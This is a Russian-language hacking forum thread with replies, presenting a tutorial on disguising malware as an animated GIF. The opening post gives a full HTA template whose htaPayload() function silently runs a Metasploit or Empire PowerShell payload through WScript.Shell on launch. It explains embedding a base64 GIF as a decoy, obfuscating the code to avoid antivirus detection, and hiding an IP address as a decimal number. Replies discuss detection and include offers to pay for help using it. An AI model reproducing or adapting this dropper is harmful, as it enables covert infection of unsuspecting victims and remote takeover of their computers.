Загрузка...

Заражение через GIF

Тема в разделе Вирусология создана пользователем Zarus 8 июл 2018. 2870 просмотров

  1. Zarus
    Zarus Автор темы 8 июл 2018 127 31 окт 2017
    Всем привет, решил описать как мне кажется веселый метод заражения наших с вами "любимых клиентов" Все будет как Мы любим, весело, легко и без палевно)
    Поехали!)

    Идем искать картинку (живую) то есть gif-ку .. была выбрана эта) далее нам по требуется код:
    генерируем powershell в Empire или Metasploit я выбрал ..

    [IMG]
    >>>КОД СКРИПТА<<<



      • <html>
      • <head>
      • <title>NazvanieGif</title>
      • <hta:application id="NazvanieGif"
      • border="thin"
      • borderstyle="complex"
      • maximizeButton="no"
      • minimizeButton="no"
      • />
      • </head>
      • <script type="text/javascript">
      • var index = -1;
      • var images = [
      • "data:image/gif;base64,"];
      • function initGallery(){
      • window.resizeTo(300,300);
      • htaPayload();
      • nextPicture();
      • }
      • function nextPicture(){
      • var img;
      • index = index + 1;
      • if (index > images.length -1 ){
      • index = 0;
      • }
      • img = document.getElementById("gallery");
      • img.src = images[index];
      • }
      • function htaPayload(){
      • var payload="";
      • try{
      • if (navigator.userAgent.indexOf("Windows") !== -1){
      • new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);
      • }
      • }
      • catch(e){
      • }
      • }
      • </script>
      • <style>
      • #gallery, div {
      • width: 100%;
      • height: 100%;
      • }
      • #outer {
      • text-align: center;
      • }
      • #inner{
      • display: inline-block;
      • }
      • body {
      • background-color: black;
      • }
      • </style>
      • <body onload="initGallery()">
      • <div id="outer">
      • <div id="inner">
      • <img id="gallery" onclick="nextPicture()">
      • </div>
      • </div>
      • </body>
      • </html>
    и вставляем в 37 строчку, между)

    [IMG]
    далее переходим на очень полезный онлайн ресурс иногда кстати выручает для различного рода задач, например кодировке IP адреса в бинарник для последущего его скрытия, не множечко отступлю от темы покажу: например скрываем 127.0.0.1
    127 = 1111111, 0 = 0 и 1 = 1 преобразовываем точки и получаем 01111111000000000000000000000001 = 2130706433 ИТОГ http: // 2130706433
    так вот переводим нашу GIF-ку в формат base64, копируем полученную кодировочку и вставляем в

    [IMG]

    [IMG]
    как видите в 17 строку)
    Осталось последнее действие конвертировать, а точнее обфусцировать, то есть спрятать вредный код от антивирусов в этой замечательной программе

    [IMG]
    сохраняем полученный код в блокноте, под любым именем но в формате .hta < -- что это за формат, у нас написано здесь Пингвиныч, привет!)) "Решил я продолжит твою темку)"
    Заключение: При запуске у жертвы появится Ваша злая GIF-ka c котикам или c ..уем), а к Вам прилетит заветная сессия) при желании можно иконку навесить (не знаю как, если кто знает, подскажите) и ДЕТЕКТА НЕТ!!
     
    8 июл 2018 Изменено
  2. РНАРАОН
    РНАРАОН 8 июл 2018 Заблокирован(а) 232 15 мар 2018
    Сложна
     
  3. UNLIM
    UNLIM 8 июл 2018 ne designer 82 11 дек 2016
    Годно
     
  4. Ambrosius
    Ambrosius 8 июл 2018 Заблокирован(а) 2372 20 фев 2017
    Годно
     
  5. KaliUltra
    KaliUltra 8 июл 2018 Заблокирован(а) 0 8 июл 2018
    можешь чуть проще объяснить?)
     
  6. ПавелЛинг91717
    Ну ты и погромист, я бы даже гифку скачать не смог, а ты тут код пишешь
     
  7. C0d3ck
    C0d3ck 8 июл 2018 Заблокирован(а) 124 26 ноя 2017
    Можно же ее на форум залить?
     
  8. Бастер
    Бастер 8 июл 2018 Everything I do exotic 13 004 18 янв 2018
    Очень криво скопировано. Все гиперссылки у тебя не являются гиперссылками.
    И зачем добавлять в конце "#моястатья", если ты тупо скопировал с другого форума?
     
  9. C0d3ck
    C0d3ck 8 июл 2018 Заблокирован(а) 124 26 ноя 2017
    На аву?
     
  10. Бастер
    Бастер 8 июл 2018 Everything I do exotic 13 004 18 янв 2018
    C0d3ck, там формат .hta, а не .gif будет
     
  11. Dyvris1337
    Dyvris1337 19 июл 2018 3 24 апр 2017
    Сложно
     
  12. XpeHycuk
    XpeHycuk 19 июл 2018 Заблокирован(а) 196 5 июл 2018
    Я не самый умный парень, но зато я знаю, что проще грузчиком работать :warpath:
     
  13. Dyvris1337
    Dyvris1337 19 июл 2018 3 24 апр 2017
    +
     
  14. еукекуе4254
    еукекуе4254 19 дек 2018 Заблокирован(а) 12 3 окт 2018
    Работает еще ? Готов заплатить кто может помочь
     
  15. h0ly_inactive655781
    h0ly_inactive655781 19 дек 2018 Заблокирован(а) 224 10 ноя 2018
    тс отпиши в лс мне в тг
     
  16. thejuztm
    thejuztm 19 дек 2018 Заблокирован(а) 115 24 июн 2017
    Пойду добавлю в блокнот список расширений, которые мне не стоит открывать и одену шапочку из фольги. :warpath:
    Но правда, оформи тему, а то залупа.

    /del - он блокнут, а я долбаёб.
     
  17. jordan2019
    jordan2019 19 дек 2018 Заблокирован(а) 267 21 мар 2018
    Спиздил с codeby тему,родоначальник Ondric форум codeby(не реклама)
     
  18. animatrix
    animatrix 19 дек 2018 45 26 окт 2018
    Kaspersky снес файл .hta, но, вообще, вроде работает, но только если попадется невнимательный мамонт
     
  19. markelov_pro
    markelov_pro 19 дек 2018 Дизайн - lolz.live/threads/7370349/ 1774 3 апр 2018
    кста да тема создана лишь в ознакомительных целях
     
  20. еукекуе4254
    еукекуе4254 19 дек 2018 Заблокирован(а) 12 3 окт 2018
    кто может помочь отпишите в лс , могу заплатить
     
Загрузка...
Top